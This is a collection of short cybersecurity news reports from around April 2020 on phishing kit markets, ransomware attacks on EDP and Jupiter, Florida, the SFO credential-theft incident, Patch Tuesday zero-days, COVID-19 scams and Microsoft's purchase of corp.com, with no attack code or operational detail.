Researchers have warned of a booming underground market for phishing kits: the tools novices can use to set up convincing websites designed to harvest victims' credentials.
Singapore-based Group-IB claimed that prices have surged 149% over the past year, while the number of ads for these kits on black market forums doubled and the number of sellers increased by over 120%.
The average price is said to have soared from $122 in 2018 to over $300 per product last year.
All of this indicates a growing demand for more complex, high quality kits — possibly because cybersecurity tools are getting better at stopping commodity attacks.
At one end of the scale, free products are often booby-trapped with backdoors enabling their creators to harvest any information collected by them, while at the other, high-end kits feature technical support and high quality phishing pages, according to Group-IB.
Group-IB said it managed to detect over 16,200 unique phishing kits in 2019. It does so by tracing the designated email address to which any harvested data is sent. The number of these unique emails rose 8% last year.
“Phishing kit creators are the driving force of this criminal marketplace — one individual might be behind the creation of hundreds of phishing pages and, even worse, behind the compromise of the personal information of thousands of people,” said Group-IB CTO Dmitry Volkov.
“Therefore, the fight against phishing kit creators should be at the core of the struggle to eradicate phishing.”
Group-IB boasted that it has already been able to deanonymize phishing kit creators and share its intel with law enforcers. However, this practice is getting harder as phishers look to hide their activities.
The vendor claimed only 113,460 out of 2.7 million phishing pages it detected last year contained a phishing kit.
The top brands targeted last year were Amazon, Google, Instagram, Office 365, and PayPal, while the top underground markets for trade in phishing kits were Exploit, OGUsers, and Crimenetwork.
Ransomware attackers are demanding €10 million ($11m) from a European energy giant or else they will release stolen corporate documents, researchers have claimed.
A group using the RagnarLocker variant appears to have targeted the Lisbon-headquartered Energias de Portugal (EDP) group, which employs over 11,000 staff globally and made over €3.3 billion in gross operating income in 2018.
Ethical hacker Vitali Kremez posted screenshots of the ransom note dated Tuesday to Twitter. In it, the attackers threaten to publish 10TB of data from the company’s file servers “or sell it to interested parties” if EDP doesn’t pay up.
Another screenshot apparently shows checks in the code to prevent execution in countries formerly part of the Soviet Union.
MalwareHunterTeam said that the screenshots of stolen data already published on the group’s ‘news’ site seems to indicate they may well have access to terabytes of data.
“As frequently, in this case too the actors were in the victim's network for some time before running the RW,” they added, on Twitter. “Obviously we can't tell from when they were in EDP's network, but it looks they already had some amount of files stolen on the 6th this month.”
Not to be confused with the similar-sounding Ragnarok ransomware, RagnarLocker was first discovered at the end of last year, targeting Windows-based systems. It’s said to target software used by managed service providers (MSPs) to stay hidden.
The EDP site itself appeared to be functioning relatively normally at the time of writing, although a pop-up window noted: “due to constraints in the information systems, your EDP Online customer area and the 808 53 53 53 service line have temporarily limited access.”
Given their role as critical infrastructure providers, utilities firms are a natural target for ransomware attackers.
Police in India have foiled a cyber-criminal's attempt to sell the world's biggest statue online for $4bn.
Cops took action after learning that an unidentified fraudster was trying to flog the 597-foot-tall "Statue of Unity" on the online Indian marketplace OLX.
The mighty statue, which stands in the western state of Gujarat, portrays statesman and independence activist Vallabhbhai Jhaverbhai Patel, known as Sardar Patel, who was one of the founding fathers of India. Completed in 2018, the statue took five years to build and stands twice as tall as the Statue of Liberty.
The scoundrel behind the fake sale fraudulently claimed that the proceeds from it would fund the Gujarat state government's ongoing fight to stop the spread of COVID-19.
"Some unknown person placed an advertisement on OLX on Saturday stating he needs to sell the Statue of Unity for ₹30,000 crore to meet the requirement of money to buy hospitals and healthcare equipment," a Kevadiya police station official said.
Indian police lodged a cheating and forgery case against the unknown fraudster last week. The audacious statue-for-sale ruse is the latest COVID-related scam to hit India.
Police and internal security officials said many Indians and non-resident Indians (NRIs) had fallen prey to fake versions of the flagship "PM CARES Fund" payments interface that look deceptively similar to the original.
“We have received over 8,300 complaints from individuals across India and NRIs who have donated thousands of dollars into fake accounts,” said a senior home ministry official.
The CEO of National Payments Corporation of India, an umbrella organization for retail payments, Dilip Asbe, added: “We have already blocked all handles with permutations and combinations of the ‘PM Cares Fund’ that were illegitimate, and we are being watchful and ensuring that the handles for donations get verified."
According to Gulf News, other cyber-scams operating in India right now that are exploiting the coronavirus outbreak include one in which fraudsters impersonate the streaming service Netflix. Using the lure of a discounted subscription while India's 1.3 billion people are under lockdown, the scammers steal victims' personal information and card payment details.
A malware attack on the Florida town of Jupiter has caused problems that are out of this world.
The Palm Beach County conurbation was struck with REvil ransomware, also known as Sodinokibi, on March 21 in an attack that took down the town's computer system for three weeks.
Kate Moretto, Jupiter's public information officer, confirmed that multiple files had been encrypted as a result of the incident.
The threat that came out of cyberspace made it impossible for Town of Jupiter employees to access their email accounts to conduct town business. Residents were left unable to make utility payments using online services, and the town's online plan-submission system was also knocked offline.
Speaking on April 1, Moretto said the town was still trying to find out how the malware had infiltrated its computer network.
Asked if the town would be paying a ransom to threat actors to retrieve its encrypted files, Moretto said that Jupiter had not engaged with any links and hadn't viewed any ransom demands. Instead, the town is recovering what data it can from backups, which Moretto described as "quite good."
“I don’t think there’s anything that’s kept it from being resolved,” Moretto said. “I just think it’s a very careful process to get everything back in place.”
Jupiter's mayor Todd Wodraska said that the timing of the attack, which befell the town in the midst of the COVID-19 health crisis, was "kind of awful."
Wodraska said: “It feels like most business types of things have really slowed down or whatever but it’s a terrible time to lose your emails because that’s really the best way of communicating with people given that you’re not supposed to be face-to-face."
Residents were asked to pay their water bills through the mail or by leaving payments in a drop-off box in the town hall.
Jupiter councilman Ilan Kaufer said that while the town's computer systems were down, he and other councilors communicated with residents via Facebook.
By April 10, most of the town's digital services have been restored, and the town website is once again operational.
This was the second such attack on Jupiter, which suffered its first run-in with ransomware in December 2018.
The United States has published fresh guidance on the "significant threat" posed by North Korea's "malicious cyber activities."
A comprehensive advisory jointly issued April 15 by the US Departments of State, Treasury, and Homeland Security, and the Federal Bureau of Investigation highlighted the threat posed by the East Asian country and gave tips on how to stay cyber-safe.
In particular, the alert warned Americans to be on the lookout for crypto-jacking, extortion campaigns, cyber-enabled financial theft, and money-laundering scams.
The alert, published today on the Cybersecurity and Infrastructure Security Agency website, states: "The advisory highlights the cyber threat posed by North Korea—formally known as the Democratic People’s Republic of Korea (DPRK)—and provides recommended steps to mitigate the threat."
According to the advisory, the DPRK's digital dastardliness could prove dangerous not just to the United States, but to the whole world.
The alert warns: "The DPRK’s malicious cyber activities threaten the United States and the broader international community and, in particular, pose a significant threat to the integrity and stability of the international financial system."
It is suggested in the alert that the DPRK is using the profits from cyber-crime to strengthen its military capabilities.
"Under the pressure of robust U.S. and UN sanctions, the DPRK has increasingly relied on illicit activities—including cybercrime—to generate revenue for its weapons of mass destruction and ballistic missile programs," states the advisory.
Financial gain is not the only motive for carrying out cyber-attacks, according to the alert.
"The DPRK has the capability to conduct disruptive or destructive cyber activities affecting U.S. critical infrastructure," warned the alert's authors. "The DPRK also uses cyber capabilities to steal from financial institutions, and has demonstrated a pattern of disruptive and harmful cyber activity that is wholly inconsistent with the growing international consensus on what constitutes responsible State behavior in cyberspace.
The UN Security Council 1718 Committee Panel of Experts' 2019 mid-term report mentions that it was investigating dozens of suspected DPRK cyber-enabled heists and that, as of late 2019, the DPRK has attempted to steal as much as $2bn through illicit cyber-activities.
A cyber-attack on San Francisco International Airport (SFO) last month was carried out by state-sponsored Russian hackers, according to Eset.
As reported by Infosecurity, the airport revealed in a breach notification last week that its SFOConnect.com and SFOConstruction.com websites came under attack in March.
“The attackers inserted malicious computer code on these websites to steal some users’ login credentials,” the notice explained. “Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO.”
However, Eset went further in a social media post yesterday, claiming that the incident was “in line with the TTPs of an APT group known as Dragonfly/Energetic Bear.”
“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” it explained.
The firm also dismissed rumors that the attack had been carried out by Magecart digital skimming hackers.
“The targeted information was NOT the visitor's credentials to the compromised websites, but rather the visitor's own Windows credentials,” it said.
It’s unclear exactly which visitors to the sites it was going after: SFOConnect appears to be a general information site designed for airport staff and contractors, while the SFOConstruction website, currently down for ‘maintenance,’ covers projects, bids and contracts related to the transport hub.
An Eset researcher confirmed that the vendor itself first reported the issue to the airport, which “quickly” fixed it.
Dragonfly has been active since at least 2011 and started out targeting organizations in the aviation as well as defense sectors, before moving on to hit energy and other industrial control system (ICS) firms in critical infrastructure industries.
Like many Russian APT groups, this one is known for relatively sophisticated, multi-stage intrusions often targeting the supply chain first before pivoting to targeted networks for reconnaissance, lateral movement and cyber-espionage.
Microsoft has fixed 113 vulnerabilities this Patch Tuesday, 19 of which are rated critical, including three zero-day bugs being actively exploited in the wild.
The second month in a row that Redmond has issued fixes for over 100 flaws, April’s update round saw patches issued for two zero-days that Microsoft warned users about at the end of March.
CVE-2020-1020 and CVE-2020-0938 are two remote code execution bugs that exist in Microsoft Windows when “the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.”
Windows 7 and Server 2008 customers are particularly at risk given that the affected platforms are no longer supported by Microsoft.
The third zero-day is CVE-2020-1027, a Windows kernel elevation of privilege flaw which could enable a locally authenticated attacker to run a specially crafted application, allowing them to execute code with elevated permissions.
A fourth vulnerability originally pegged as a zero-day has not been exploited in the wild. CVE-2020-0968 is a memory corruption vulnerability in Internet Explorer due to the improper handling of objects in memory by the scripting engine.
Although not yet exploited, there are several possible scenarios that could put customers at risk, according to Tenable.
“An attacker could convince a victim to visit a website containing malicious code, whether or not that website is owned by the attacker, or a compromised website with malicious code injected into it,” the firm explained. “Another scenario would require the attacker to embed the malicious code into a Microsoft Office document and convince the victim to open it.”
Recorded Future intelligence analyst, Allan Liska, revealed that much of the research done by Microsoft this month was down to a surprising source.
“In 2019, a security researcher going by the handle SandboxEscaper released more than a half dozen zero-day vulnerabilities against Microsoft products,” he explained.
“In a surprising, but welcome, move for Microsoft, they have hired SandboxEscaper and the researcher has made several contributions to this month’s Patch Tuesday. This is great news for Microsoft and the security community at large.”
There has been a huge rise in the number of breached records of governments and individual politicians in the first quarter of 2020, according to research from Atlas VPN. The study showed there were 17 million leaked government records during this period: a 278% increase compared with the first quarter of 2019.
These included several high profile cases, which left sensitive data of citizens exposed to cyber-criminals. In March 2020, the Dutch government disclosed losing two external hard drives, each containing the personal information of over 6.9 million organ donors. In this case, it remains unknown who was responsible and there is currently no evidence of anyone attempting to use the information.
In another case, the records of 6.5 million Israeli citizens voters were leaked online in February, and in the same month, the government of Quebec, Canada, admitted to a data breach that has potentially exposed the records of 360,000 teachers.
The findings serve as a wake-up call for governments around the world.
Rachel Welsh, COO of Atlas VPN, commented: “Hackers are always searching for networks that have not implemented the latest cybersecurity measures. This year, it happens to be the case that government websites and applications had many security vulnerabilities. It is unfortunate to see that governments do not invest in protecting their networks the best they can since they are responsible for their citizen’s data.”
The report also revealed that malware, phishing and command and control were the most common types of cyber-attacks to take place during March. Malware was the single most common method hackers used to intercept devices, reaching 80,000 attempts globally, representing 53% of all cyber-attacks last month.
Atlas also noted that the real number of government data breaches in this period could be “exponentially higher,” with many exposures not revealed until a few months later. This is even more likely in light of increased hacker activity related to the COVID-19 pandemic.
US consumers have already lost over $13m to COVID-19-related scams since the start of the year, according to new data from the Federal Trade Commission (FTC).
The consumer protection agency revealed in figures released on Monday that it had received 17,425 fraud reports linked to the pandemic, around 46% of which featured monetary loss.
The median fraud loss works out at $568, according to the figures.
Of the 17,000 overall reports, the vast majority (55%) were fraud-related, around a third (32%) were labelled “other,” 7% were “Do Not Call” (DNC) telemarketing scams and a similar number (6%) were labelled as identity theft.
DNC scams are mainly automated (72%) and often impersonate government or businesses. Other popular topics linked to COVID-19 are prescriptions and medical-themed calls, debt reduction and warranties/protection plans.
The volume of these so-called robocalls soared by 325% from 2017 to 2018 to reach an estimated 85 billion worldwide two years ago, according to Caller ID firm Hiya.
The most commonly reported FTC scams were linked to travel (30%), online shopping (19%) and text message-based fraud (11%). So far, consumer financial losses from travel scams have hit nearly $4.8m, followed by online shopping ($1.5m) and “imposter: business” fraud ($1.2m).
The largest number of FTC complaints came from California (2068) followed by Florida (1230), New York (1114) and Texas (1109).
In a bid to further protect consumers from COVID-19 scams, the FTC yesterday sent multiple warning letters to companies in the US and abroad demanding they stop making claims their products can treat the virus.
If the companies don’t comply, the FTC said it may ask a federal court to require money be returned to consumers.
The offending products include a “Face Vital Sonic Silicone Facial Brush,” “PuraTHRIVE Liposomal Vitamin C,” and intravenous (IV) solutions such as “Immunity Boost” IV drips, the “Myers’ Cocktail IV package,” and “High Dose Vitamin C Plus Immune Booster” — the latter of which was advertised on Facebook and Instagram.
“It’s shameful to take advantage of people by claiming that a product prevents, treats, or cures COVID-19,” said Andrew Smith, director of the FTC’s Bureau of Consumer Protection. “We’re seeing these false claims for all sorts of products, but anyone who makes them simply has no proof and is likely just after your money.”
The United Kingdom's National Health Service (NHS) has refuted claims that it considered giving ministers the power to de-anonymize users of its planned COVID-19 contact-tracing app.
Plans to roll out the new smartphone app were announced on Sunday, April 12, by health secretary Matt Hancock during a daily UK pandemic briefing. It is hoped that by allowing people who develop COVID-19 symptoms to quickly alert others with whom they have been in proximity, the app will help to stem the spread of the deadly novel coronavirus in the UK.
The new app is currently being developed by the NHSX—the digital innovation branch of the National Health Service—with testing of an early version expected to get under way in the North of England this week.
Explaining how the NHS app would work, Hancock said: “If you become unwell with the symptoms of coronavirus, you can securely tell this new NHS app and the app will then send an alert anonymously to other app users that you’ve been in significant contact with over the past few days, even before you had symptoms, so that they know and can act accordingly.”
The NHSX has said that for the app to be effective, it will need to be adopted by more than 60% of the UK's 66.65 million inhabitants.
Addressing privacy concerns over the contact-tracing app, Hancock said that it would be completely voluntary to use and that users would remain anonymous.
"All data will be handled according to the highest ethical and security standards and would only be used for NHS care and research," said Hancock.
However, a draft government memo produced in March and seen by The Guardian discusses how ministers might be given the ability to order “de-anonymization” of data collected via the app to identify people from their smartphones.
The document headed “official – sensitive” and “draft – not yet approved” stated that the app could use device IDs, which are unique to all smartphones, “to enable de-anonymization if ministers judge that to be proportionate at some stage.”
A spokesperson for NHSX denied there were ever plans to de-anonymize data.
A container shipping company has said malware could be to blame for the closure of one of its data centers last week.
The Mediterranean Shipping Company (MSC) took to Twitter on Good Friday to report a network outage issue affecting the website msc.com, which was still down at time of writing.
The incident, which is thought to have occurred on Thursday, April 9, also brought down the shipping company's myMSC portal.
A message posted from the Twitter account MSC Cargo on April 10 stated: "We are sorry to inform you that http://MSC.com and myMSC are currently not available as we've experienced a network outage in one of our data centers. We are working on fixing the issue."
As a result of the outage, self-service tools for making and managing bookings on MSC ships have ceased to be operational. Alternative booking platforms are available, and customers can still book via email and over the phone.
"All our departments, terminals and depots are operating without disruptions,” said MSC. “Customers can still book via INTTRA and GT Nexus, which are both fully functional, or place bookings via email.”
While an investigation into what caused the data network outage is ongoing, MSC said that there was a chance that a cyber-attack could be at the root of the problem.
In a message posted on Twitter on April 10, MSC said: "At this point in time we cannot rule out entirely the possibility of malware, but we can confirm that our agencies worldwide network is working. And that our local agents support customers for all services as usual."
Following the incident, the container shipping company has closed down its servers at its headquarters in the Swiss city of Geneva. MSC said that the incident had only affected internal data processes and that the servers had been closed for security reasons.
In a tweet shared on April 12, MSC appeared confident that a fix was just around the corner, writing, "Significant progress has been made to solve the network outage, and we are confident the issue will be solved shortly. We will continue to issue regular updates."
(ISC)² is offering online training at heavily discounted prices in a bid to help cybersecurity professionals across the world continue their training and development during the COVID-19 pandemic. The move aims to offset the difficulties those working in the sector are facing in staying up-to-date with the latest cybersecurity practices during this period, with meetings and conferences unable to take place.
With many employees currently working remotely, it is more important than ever for businesses to have the most stringent cybersecurity practices in place to protect themselves. (ISC)2, a non-profit association of certified cybersecurity professionals, has therefore introduced special discounts on a number of its virtual training packages to enable the continued development of professionals working in this area.
These include free access to all to its ‘Utilizing Big Data’ course, an All-Access Pass to its entire Professional Development Institute (PDI) library of 35 courses for one year to non-members, and a 33% discount for its Certified Information Systems Security Professional (CISSP) and Certified Cloud Security Professional (CCSP) training courses. There are also deals in place for (ISC)²’s online instructor-led training and webinars featuring expert-led discussions on a range of security topics.
“This is a challenging time for many organizations as well as the cybersecurity professionals who keep them safe from cyber-attacks, as they work to support remote workforces and keep their businesses running,” commented Wesley Simpson, COO of (ISC)2. “These professionals still have development and certification goals though, and with travel restrictions and cancelations keeping them from in-person trainings, meetings and conferences, we want to do our part to help them stay on track. These resources are just another way that we can hopefully support the larger cybersecurity community and encourage them to sharpen their skills while dealing with this pandemic.”
(ISC)² has over 150,000 members made up of certified cyber, information, software and infrastructure security professionals worldwide.
British model turned pop singer Dua Lipa has called for social media platforms to be monitored more closely for cyberbullying behavior.
In an interview with music magazine NME, the 24-year-old singer of "Future Nostalgia" opened up about her own experience of being cyberbullied.
Dua Lipa said that she used to run her own Twitter account personally, but the stress of dealing with negative cyberbullying comments became too much for her. Unwilling to exit a convenient platform that helps her stay in touch with her fans, the singer handed over the management of her Twitter account to her media team.
Practicing mental separation has given Dua Lipa the strength to continue using her Instagram account.
“I feel like on Instagram, I post as if I’m on a blog and I can just separate myself from it whereas, on Twitter, after I tweet I try and check all the comments,” she said.
“That was obviously getting quite unhealthy ’cause I would just get really upset about [the response].”
Cyberbullying is a growing social problem. Research conducted by the Cyberbullying Research Center found that in 2019, 36.5% of people felt that they had been bullied compared to just 18.8% of people in 2007.
Dua Lipa said that current monitoring practices for cyberbullying on social media platforms didn't go far enough and called for platform managers to take this digital threat to mental health seriously.
She said: “I know if there’s any abusive content or blah blah blah, they take it down. But I don’t think they see certain things or types of cyber bullying as seriously as they are. Those things need to be monitored a little closer.”
Dua Lipa's comments come as people around the world are increasingly using social media platforms to stay in contact with friends and family while isolating at home to prevent the spread of COVID-19.
According to a recent report by Kantar, the global health crisis has caused social media engagement to increase by 61% over normal usage rates. Overall use of Facebook has shot up by 37%, while Chinese micro-blogging platform Weibo has seen a 58% increase in usage.
Dutch police last week dismantled 15 DDoS “booter” sites and arrested a 19-year-old suspected of taking out two government websites which help citizens get information on the current COVID-19 pandemic.
The man from the southern Dutch city of Breda was caught on suspicion of DDoS-ing MijnOverheid.nl and Overheid.nl for several hours last month.
The former provides a personalized portal for sending and receiving documents to the government, while the latter offers the latest information from the authorities, including important COVID-19 updates.
“By flattening a website like this, you are denying citizens access to their personal data and important government information. We take this very high, especially now that the corona crisis is causing additional uncertainty and a great need for information for many people,” said Jeroen Niessen, head of the cybercrime team of the central Netherlands police.
“We want to protect people and companies and make it increasingly difficult for cyber-criminals to carry out a DDoS attack.”
To that end, the same team shut down 15 “booter” sites offering DDoS-for-hire services. These operations have essentially democratized what used to be a technically complex and expensive process, allowing almost anyone to target specific sites and organizations.
“With preventive actions, we want to protect people as much as possible against DDoS attacks. By taking booters and their domain names offline, we make it difficult for cyber-criminals. We have now put quite a few [offline]. If they pop up elsewhere, we will immediately work on it again. Our goal is to seize more and more booters,” said Niessen.
According to data from Imperva, porn sites were most frequently attacked by DDoS-ers last year. It revealed 84.46 attacks per site during 2019, way higher than second and third-placed sectors gaming (13.33) and news (10.16).
Dutch police have a strong competence in cybersecurity, and are often involved in major pan-European operations such as the take downs of notorious dark web sites AlphaBay and Hansa in 2017.
San Francisco International Airport (SFO) has revealed that some users of its websites may have had their logins stolen after a cyber-attack last month.
In a notification posted last week, the major transport hub revealed that its SFOConnect.com and SFOConstruction.com sites came under attack in March.
The former appears to be a general-purpose information site for employees and passengers while the latter covers projects, bids and contracts related to the airport.
“The attackers inserted malicious computer code on these websites to steal some users’ login credentials. Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO,” the breach notification revealed.
“What information was involved? At this time, it appears the attackers may have accessed the impacted users’ usernames and passwords used to log on to those personal devices.”
The airport took the affected websites offline following the incident and forced a reset of all SFO-related email and network passwords on March 23. The offending malicious code has also apparently been removed.
However, those possibly affected were urged to take action.
“If you visited either website outside of SFO’s managed networks and using Internet Explorer on a Windows-based device, you should change the password you use to log in to that device,” SFO warned. “You should also consider changing any credentials that use the same username and password combination.”
Colin Bastable, CEO of cyber-training and awareness firm Lucy Security, argued that SFO may have been exposed by employees using work credentials on subsequently breached sites.
“From a cursory glance in the darker corners of the web, I think the biggest risk to flysfo.com is from their employees using official email addresses for personal business on sites like Zynga and Myfitnesspal.com,” he said.
“I also found around 8,00 compromised credentials from late February featuring a couple of flysfo.com email addresses. Perhaps one of these opened the door, allowing the malicious code to be dropped in the SFO websites."
The SFO Construction site is currently undergoing maintenance, while the other appears to be back up and running.
Security researchers have discovered almost four million credentials linked to digital collectibles site Quidd, including a sizeable number of corporate email addresses.
Risk Based Security’s Data Breach Research Team announced the discovery on Friday, revealing the data was available “on a prominent deep web hacking forum.”
It apparently features the email addresses, usernames and bcrypt hashed passwords of 3,954,416 users.
“The compromised data sets were originally posted on March 12 2020 and self-attributed to a threat actor named ‘Protag.’ However, the files were quickly removed,” the firm explained.
“The data resurfaced on March 29 2020 when it was reuploaded by a different user and has since remained available. One threat actor responded to the post stating that he has already cracked, or decrypted, nearly a million password hashes.”
Although the use of bcrypt will make the passwords harder for cyber-criminals to monetize, concerns persist, especially for some businesses.
Around 1000 of the user credentials are linked to corporate email addresses, including the accounts of employees at Microsoft, Target, Virgin Media, Accenture, Experian, AIG and other organizations.
Risk Based Security warned the corporate angle could put these firms at extra risk from business email compromise (BEC) and spear-phishing attempts.
That’s besides the more general risk of credential stuffers using the four million-strong data trove to try their luck across other accounts.
Quidd itself has not responded to inquiries from the researchers about the incident, since its discovery. The Brooklyn-based firm deals in “digital collectibles” from over 300 brand partners including Disney and DC Comics.
According to Risk Based Security, the leaked data is not being offered for sale, but access is also unrestricted.
Police in the United States have arrested a 39-year-old man for spreading false information about COVID-19 on social media.
San Antonio resident Christopher Charles Perez is accused of starting a coronavirus hoax with a post on his Facebook page.
A federal criminal complaint unsealed April 8 charges Perez with one count of violating 18 United States Code § 1038, which criminalizes the spread of false information and hoaxes related to biological weapons and weapons of mass destruction.
The complaint alleges that Perez posted a threat on Facebook in which he claimed to have paid someone to deliberately spread the novel coronavirus around grocery stores in the San Antonio area of Texas.
In his defense, Perez claimed that the post was a misguided attempt to help prevent the spread of the virus. He said that he posted the bizarre threat in the hope of deterring people from visiting stores and coming into contact with other shoppers.
An anonymous online tipster sent a screenshot of the threat allegedly posted by Perez to the Southwest Texas Fusion Center (SWTFC) on Sunday. After reviewing the Facebook post, the SWTFC contacted the Federal Bureau of Investigation (FBI) office in San Antonio for further investigation.
Perez was arrested by the FBI without incident at his home on Chateau Drive late in the afternoon of Tuesday, April 7. The accused is currently being held in federal custody.
If convicted of the charges against him, Perez could be handed a jail term of up to five years in a federal prison.
The FBI’s Weapons of Mass Destruction Squad and the Joint Terrorism Task Force are investigating this case. Assistant US Attorney Mark Roomberg is prosecuting the case on behalf of the government.
The San Antonio grocery stores that Perez allegedly paid someone to infect with COVID-19 were not mentioned in the criminal filings.
A spokesperson for the Department of Justice said: "To be clear, the alleged threat was false; no one spread coronavirus at grocery stores, according to investigators."
At the time of writing, 177 people had died from COVID-19 in Texas, where there are 9,353 confirmed cases.
A bug bounty platform is inviting hackers to share the proceeds of their successful bug hunts with the COVID-19 Solidarity Response Fund.
On April 8, HackerOne set up a special link on its website that lets hackers donate all or part of the bounties they earn to charity in just a few clicks.
"The community has come together in some amazing ways to support COVID-19 relief efforts from Marc Rogers’ CTI League, the US Digital Response group helping governments, to individual hackers raising their hand to help. Today, HackerOne is doing our part by making it even easier for hackers to give back through bug bounties (monetary earnings for finding real-world security vulnerabilities) with a custom donation profile—https://hackerone.com/hackforgood," said a spokesperson for HackerOne yesterday.
"Hackers can invite 'hackforgood' as a collaborator on any paid bug bounty program to donate all or part of the money they earned to charity."
Although the donation profile was set up in response to an active pandemic, HackerOne said the concept could endure long after the health crisis is resolved.
"The charity will rotate on a monthly basis, but right now donations will go to The World Health Organization (WHO) COVID-19 Solidarity Response Fund," said a spokesperson for HackerOne.
The COVID-19 Solidarity Response Fund was established by the World Health Organization to help countries around the world combat the spread of the novel coronavirus.
Donations help to pay for buying and shipping personal protective equipment to frontline workers, patient care, producing evidence-based guidelines and advice, and accelerating efforts to develop vaccines, tests, and treatments.
Hacking for charity isn’t a new concept. The "2020 Hacker Report" published by HackerOne in February found that over a quarter of hackers carry out hacking activities "to protect and defend, do good, and help others."
Earlier this year, a team of 4 hackers known as The Syndicate took to Twitter to announce that they will be donating 5% of all live hacking event earnings to charity and 5% of their time in 2020 and beyond to volunteering.
Microsoft has purchased Corp.com for an undisclosed sum two months after the domain was advertised for sale at $1.7m.
The domain is believed to pose a danger to Microsoft's clients because of a "namespace collision" issue that occurs when domain names intended for exclusive use by an internal company network overlap with regular internet domains.
As a result of the collision, the Corp.com domain has been receiving an unending stream of passwords, emails, and other sensitive data from hundreds of thousands of Microsoft Windows PCs at major companies around the globe for years.
News of the transaction was broken by Brian Krebs on April 7. Previous owner of Corp.com, Mike O'Connor, told Krebs that he "hoped Microsoft would buy it because hundreds of thousands of confused Windows PCs are constantly trying to share sensitive data with corp.com."
Wisconsin resident O'Connor essentially did nothing with the domain since buying it 26 years ago. On April 6, he confirmed the sale of the domain to Microsoft for an undisclosed sum.
Microsoft said the acquisition of the domain was undertaken to protect the privacy of its customers.
In a written statement, the company said: “To help in keeping systems protected we encourage customers to practice safe security habits when planning for internal domain and network names.
“We released a security advisory in June of 2009 and a security update that helps keep customers safe. In our ongoing commitment to customer security, we also acquired the Corp.com domain.”
Commenting on the sale, Jake Moore, cybersecurity specialist at ESET, said: “Domains are highly sought after by criminal hackers to add value when sending out phishy communications. If this particular web URL was used unethically, it could have caused a huge amount of misunderstanding—along with other potential consequences—to a large number of Microsoft customers.
"A typical trait of cyber criminals is to purchase similar domains to well-known brands so that when victims quickly check the sender’s address, it may look legitimate. Therefore, scammers can take advantage of their victim believing this false validation from the sender, encouraging them to click on dodgy links and attachments.
"It goes without saying that people need to double check sender addresses and not act on any unsolicited communication.”
Cybercrime levels have not increased since the start of COVID-19, and the volume of related attacks remains relatively low, according to new information from Microsoft and the US and UK governments.
The joint government alert came from the UK’s National Cyber Security Centre (NCSC) and US Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA).
It explained what many in the industry already know: that bad actors are using the pandemic as a lure to spread malware and harvest details via phishing emails, and are scanning for vulnerable VPNs.
It also warned that hackers are spamming out SMS phishing attempts, and emails spoofed to appear as if sent from popular video conferencing platforms such as Zoom or Microsoft Teams, containing booby-trapped attachments.
Yet despite the headlines, overall threat levels haven’t increased; attackers are simply diverting more resources to capitalize on widespread user awareness of the current crisis and changing working patterns.
“Malicious cyber-actors are adjusting their tactics to exploit the COVID-19 pandemic, and the NCSC is working round the clock with its partners to respond,” said NCSC director of operations, Paul Chichester.
“Our advice to the public and organizations is to remain vigilant and follow our guidance, and to only use trusted sources of information on the virus such as UK Government, Public Health England or NHS websites.”
It’s a message that was echoed by Microsoft in an update yesterday.
“Attackers don’t suddenly have more resources they’re diverting towards tricking users; instead they’re pivoting their existing infrastructure, like ransomware, phishing, and other malware delivery tools, to include COVID-19 keywords that get us to click,” explained Microsoft 365 Security CVP, Rob Lefferts.
“Our data shows that these COVID-19 themed threats are retreads of existing attacks that have been slightly altered to tie to this pandemic. This means we’re seeing a changing of lures, not a surge in attacks.”
In fact, of the millions of daily phishing emails Microsoft detects, only 60,000 have COVID-19 related malicious attachments or URLs, less than 2% of the total volume of threats the firm tracks each day.